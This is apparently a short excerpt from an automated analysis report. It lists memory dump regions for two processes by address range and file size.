-
memory/1396-140-0x0000015CB2390000-0x0000015CB23B2000-memory.dmpFilesize
136KB
-
memory/1396-137-0x00007FFB7F403000-0x00007FFB7F405000-memory.dmpFilesize
8KB
-
memory/1396-138-0x0000015CB2380000-0x0000015CB2382000-memory.dmpFilesize
8KB
-
memory/4076-158-0x0000013C43890000-0x0000013C43892000-memory.dmpFilesize
8KB
-
memory/4076-157-0x00007FFB7F403000-0x00007FFB7F405000-memory.dmpFilesize
8KB
-
memory/4076-159-0x0000013C43893000-0x0000013C43895000-memory.dmpFilesize
8KB
-
memory/4076-160-0x0000013C43896000-0x0000013C43898000-memory.dmpFilesize
8KB
-
memory/4076-161-0x0000013C5F050000-0x0000013C5F094000-memory.dmpFilesize
272KB
-
memory/4076-162-0x0000013C5F4A0000-0x0000013C5F516000-memory.dmpFilesize
472KB